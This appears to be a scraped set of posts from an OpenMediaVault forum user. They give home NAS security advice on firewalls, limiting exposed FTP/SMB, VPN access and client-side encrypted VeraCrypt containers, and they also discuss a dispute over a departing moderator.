mc, cp, mv...
I personally use the container instead of encrypting the entire disk. I don't mount in omv, I just provide the container via smb and mount it locally on the end pc.
By "mounted" you mean and decrypted?
Firewall rules are generally a very complex issue and only view users are familiar with it.
Yes and no. A few simple rules for the average user at home I would rather not call complicated. And no matter what fw or operating system. We are not building here a set of rules for a large complex network where the level of threats is high.
I am always sad when so few people use a firewall. It is not about any complicated rule sets but rather a simple in / out control policy and awareness of what the user's computer or network is doing. If soho routers did not have NAT then the situation would be absurd with the number of publicly available services without people being aware of what their computer is doing.
Of course, I advise against doing copy / paste without knowing at least to a minimum what the rules do. Because you can block or open something that you did not plan.
Unfortunately, also a very large number of guides on the web is now quite outdated and often introduces more errors to the user's thought process.
in my opinion, a firewall should be treated like a door with locks and this is how the user should think about it. But even in the linux world there is such a narrative that a firewall is not especially needed for a novice user. And thus you don't develop habits of using and learning it.
The question is, do you need to have ftp publicly available to the whole world. If not, block all IPs and allow only those that belong to you and need access to ftp. Same for other services you have running in omv!
If something does not have to be available from outside your lan block access to it. If you need to have access to your omv somewhere outside your lan maybe think of a zerotier or vpn.
I have already published firewall rules in this forum. If you're interested, you can search. But nobody was interested in it ...
And of course, always make sure that the software is up-to-date and that there is no anonymous access to services.
Your car is publicly available. Anyone can touch it. No law prohibits this. For this, put it in a private guarded garage!!!
CHTD, Chunghwa Telecom Co.,Ltd.
Taipei, Taiwan, 100
China Unicom Shandong Province Network
You exposed the service to the touch of the world, various strange things will touch it. Limit the IP range using firewall or hide ftp behind nat. Unless you have to expose the service to the world, take into account that different bs will try to connect. If your car is standing on the street, anyone who wants to pass by can simply touch it and check if the doors are closed or can be opened.
Are you sure? Is the only threat model the physical theft of a data disk? What about online penetration?
I would be more concerned with online threats than with physical theft, although you should protect yourself against this.
Everything comes to the question of what data and how and when it must be available. Do they need to be decrypted on the NAS? Can you transfer this vector to the user's destination machine?
If the data does not have to be directly available on the NAS, I would personally consider the encrypted container. Which always remains encrypted on the NAS at all times. No matter whether the physical or online threat the data is always encrypted. And the entire decryption process takes place only on the user's target machine. In this way, you eliminate the consequences of online penetration and data leakage, which is not protected by disk encryption.
Since you are afraid of data leakage through physical theft, you should be even more afraid of an online leak that is more likely to occur.
On NAS, the encrypted veracrypt container which you mount on your machine via smb / nfs. In this way, the only place of data leakage when it is decrypted is the user's machine. Which limits the attack vectors and the amount of time the data is exposed to leakage.
And yes the HC2 seems a good choice if a bit overkill.
Indeed I already own 1 which I am using as an OMV nas machine for general repository purpose. Adding a second would be fine.
It's sole drawback (as a nas) is its tendency to overheat a bit but I presume that my mailserver application would not stress it anyway so...
If you don't want HC2 then maybe NanoPi Neo. Or rent a dedicated server or vps.
If HC2 is too hot then https://www.amazon.com/ARCTIC-…le-Portable/dp/B003XN24GY
Maybe try symlink...
I have no experience with sbc as a mail server but maybe Odroid HC2. Or some atom ... $
Only when you take a tea break.
Changing the root password on an unencrypted disk is just a paste a new hash in shadow...
ftp for remote file access. its a very unsafe, old protocol.
Old? Of course.
Unsafe? Well no, only when you use naked without tls.
That's what FTPS exists for. I use for years I had no problems with session security.
The idea is to prevent access to personal information in case of a theft. Even if the drive is automatically unlocked, you would still need to login to the NAS to get access to the files, right? and if the drive is removed from the case, it would be encrypted. So I will look into crypttab for this purpose, thanks for the pointer.
But perhaps I need to learn how others are dealing with drive encryption, as there might be an easier way for my use case.
I am planning to access the NAS from remote locations via FTP - but maybe I can use another method, which could allow me to run a script remotely to unlock and mount the drive only when needed? I need this to be "wife" ready, so automation is key.
FTPs, SFTP, Nextcloud.
The more you put the system into the world, the more likely it is that someone will get inside.
SMB exposed to the world is asking for trouble. Do you really need so many things available from outside the lan?
Place the vpn server and connect to the lan resources. Or use ZeroTier.
You pretend to have sensitive data ... Do you actually have it? If so, start thinking about separation and encryption.
A separate machine only for sensitive data and only service / services that are absolutely necessary, nothing more. Keep data encrypted, the entire disk or container. Ideally, the data should be in such a form that the NAS never has them as decrypted.
Even if the attack succeeds on the NAS, the attacker will only take encrypted data. All decryption should rather take place on the user's target machine and the NAS should only be treated as a storage site for the encrypted content.
For me, that´s not the point. He was certainly often right as for the technical question. But it was the way he thaught it. That is not an appropriate behavior of a moderator.
So you judge someone by the way he behaves and do not take into account the technical reasons. Only is it actually a fully adequate evaluation model? People are hypersensitive now. They do not often understand the other side. In the IT world such behaviors are not unusual.
Personally, I worked with very difficult characters with a big ego, but at the end of the day technical efficiency counts, and not whether I like someone for what a nice person is.
The problem is, he has a long history of this behavior on forums. It's no secret, the threads have been linked here many times. If it's not crashtest, it's someone else.
To anyone willing to overlook is intellect, this makes it painfully obvious who the problem was. I don't think crashtest was completely innocent, even he admits he goaded him a bit recently, but only due to his constant attacks virtually anywhere he posted.
I do not know. I have never been part of this conflict, I do not know the case so deeply ....
Logically, I think that it was possible to try to solve the situation in a different way. But apparently for many the solution to the problem at the end of the day is his departure. Problem solved .... there will be no more conflict.
It is unfortunate that adult people can not work out a compromise and coexist in their presence.
The point I'm trying to make is that @tkaiser is always right in his opinion, no one else's opinion or ways of doing things counts.
I have been asked to put together a troubleshooting guide for Raid, I have made a start at present it's now sitting on a back burner, why? simply because I do not have the patience to deal with someone as @crashtest has had to deal with in relation to his guide and any other assistance he has given to users.
Hmmm I do not know him to be able to put forward such theses. But if you say so... I have doubts whether it really is 100%.
Certainly, character and ego play a big role in the way people communicate and approach people, but ... I'm talking more about technical queries here. That someone would show this untrue statement directed by @tkaiser to others.
If you claim he was never right ... it would mean that his knowledge is extremely low which again somehow contradicts the facts.
I can understand a harsh approach but does it mean that he has never been right?
I have the impression that some judge him through the prism of personal I like / dislike, and not the actual state of technical right / not right.
I disagree too. It´s not what you say, but how you say it.
You do not agree. Everyone does not agree. So many of you think that @tkaiser is such....
But somehow no one gives particulars when I ask about them. Only loose opinions without any details.
Fine. never mind. He's leaving here anyway. Now probably there will be a much nicer place according to some people. And the technical level will probably increase. And the contribution to omv / arm will be as big as ever.
Typically, the fault in such situations is not 100% on one side only. But if you disagree, maybe I do not know about everything ... now probably there will be a better place here without @tkaiser judging by some statements